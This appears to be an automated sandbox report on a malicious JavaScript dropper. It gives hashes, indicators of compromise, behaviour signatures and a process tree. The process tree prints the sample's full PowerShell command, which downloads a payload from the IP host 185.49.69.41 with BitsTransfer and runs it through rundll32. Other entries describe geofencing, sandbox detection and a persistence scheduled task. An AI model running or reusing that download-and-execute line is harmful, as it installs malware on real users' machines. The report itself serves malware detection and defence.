Analysis
-
max time kernel
152s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
23-05-2024 06:05
Static task
static1
Behavioral task
behavioral1
Sample
9e182abd97e46d2788e637b1969deede1821bc08ece40d731ec1051be0b32330 (1).js
Resource
win7-20240419-en
General
-
Target
9e182abd97e46d2788e637b1969deede1821bc08ece40d731ec1051be0b32330 (1).js
-
Size
134KB
-
MD5
1f2912c0c12b316023061de20ee3cc55
-
SHA1
05cad925852e41a0832bc9bf3db5056990d027d4
-
SHA256
9e182abd97e46d2788e637b1969deede1821bc08ece40d731ec1051be0b32330
-
SHA512
226d9de84f0a3624e8b84ec3f89026299d457907faab3246694b04de40af76d927561ccbf463444e5049dd55ac2a72f4e727c6e10f4a490604c01738142c7f5b
-
SSDEEP
1536:BIscHpcWN6ns7eemQA1iPFmpcEo0SlWu37kxlvtqMPeHp6o:5cHDesSemV1iQWEo0SlWA7Alvtl8f
Malware Config
Extracted
http://185.49.69.41/data/b413842a6f5f431ab839f99fe3f6d3a9
Signatures
-
Blocklisted process makes network request 13 IoCs
Processes:
rundll32.exeflow pid process 47 4248 rundll32.exe 49 4248 rundll32.exe 50 4248 rundll32.exe 51 4248 rundll32.exe 52 4248 rundll32.exe 53 4248 rundll32.exe 55 4248 rundll32.exe 56 4248 rundll32.exe 57 4248 rundll32.exe 58 4248 rundll32.exe 59 4248 rundll32.exe 64 4248 rundll32.exe 65 4248 rundll32.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
wscript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation wscript.exe -
Loads dropped DLL 1 IoCs
Processes:
rundll32.exepid process 4248 rundll32.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in System32 directory 1 IoCs
Processes:
rundll32.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\ZIBYF9XW.htm rundll32.exe -
Drops file in Windows directory 1 IoCs
Processes:
rundll32.exedescription ioc process File created C:\Windows\Tasks\RtlCpl.job rundll32.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 5 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
rundll32.exedescription ioc process Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor rundll32.exe Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor rundll32.exe -
Modifies data under HKEY_USERS 3 IoCs
Processes:
rundll32.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepid process 1680 powershell.exe 1680 powershell.exe 1680 powershell.exe 3524 powershell.exe 3524 powershell.exe 3524 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1680 powershell.exe Token: SeDebugPrivilege 3524 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
wscript.exepowershell.exepowershell.exedescription pid process target process PID 3400 wrote to memory of 1680 3400 wscript.exe powershell.exe PID 3400 wrote to memory of 1680 3400 wscript.exe powershell.exe PID 1680 wrote to memory of 3524 1680 powershell.exe powershell.exe PID 1680 wrote to memory of 3524 1680 powershell.exe powershell.exe PID 3524 wrote to memory of 2364 3524 powershell.exe rundll32.exe PID 3524 wrote to memory of 2364 3524 powershell.exe rundll32.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe "C:\Users\Admin\AppData\Local\Temp\9e182abd97e46d2788e637b1969deede1821bc08ece40d731ec1051be0b32330 (1).js"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -c "start-job { param($a) Import-Module BitsTransfer; $d = $env:temp + '\' + [System.IO.Path]::GetRandomFileName(); Start-BitsTransfer -Source 'http://185.49.69.41/data/b413842a6f5f431ab839f99fe3f6d3a9' -Destination $d; if (![System.IO.File]::Exists($d)) {exit}; $p = $d + ',Start'; rundll32.exe $p; Start-Sleep -Seconds 10} -Argument 0 | wait-job | Receive-Job"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\hlxfhdqd.ob4,Start4⤵
- Drops file in Windows directory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3976 --field-trial-handle=2900,i,14549994492153927475,12895178890800740987,262144 --variations-seed-version /prefetch:81⤵
-
C:\Windows\system32\rundll32.exeC:\Windows\system32\rundll32.exe "C:\ProgramData\RtlCpl\RtlCpl.dll",Start /p1⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\RtlCpl\RtlCpl.dllFilesize
59KB
MD559fcd8a54f43d911fc7a8945e07b0246
SHA1759fcbf9f7a7d2ec42f938e0c69acfc07c682a97
SHA2561bcfed8b593a8a7c8b34e074aca3d4fc68a0ea3343b32eae89fdabf35ad40e7d
SHA5126d67da2334a4e2e4f4c615d8661a5df2be3fc5467f5636760c15322c3abe5cfe1df339b29dfa008362f6e34b8afad44aef6858eb8aa1cae9c2b0dc7cc2ba7332
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ieymjob3.dqx.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/1680-14-0x00000209A89C0000-0x00000209A8B36000-memory.dmpFilesize
1.5MB
-
memory/1680-3-0x000002098FCD0000-0x000002098FCF2000-memory.dmpFilesize
136KB
-
memory/1680-2-0x00007FFE89A50000-0x00007FFE8A511000-memory.dmpFilesize
10.8MB
-
memory/1680-13-0x00007FFE89A50000-0x00007FFE8A511000-memory.dmpFilesize
10.8MB
-
memory/1680-0-0x00007FFE89A53000-0x00007FFE89A55000-memory.dmpFilesize
8KB
-
memory/1680-15-0x00000209A8D50000-0x00000209A8F5A000-memory.dmpFilesize
2.0MB
-
memory/1680-30-0x00007FFE89A50000-0x00007FFE8A511000-memory.dmpFilesize
10.8MB
-
memory/1680-1-0x00007FFE89A50000-0x00007FFE8A511000-memory.dmpFilesize
10.8MB
-
memory/2364-31-0x00007FFE8F660000-0x00007FFE8F677000-memory.dmpFilesize
92KB
-
memory/3524-25-0x0000023E74910000-0x0000023E74936000-memory.dmpFilesize
152KB
-
memory/3524-26-0x0000023E74970000-0x0000023E74984000-memory.dmpFilesize
80KB
-
memory/4248-38-0x00007FFEA3700000-0x00007FFEA3717000-memory.dmpFilesize
92KB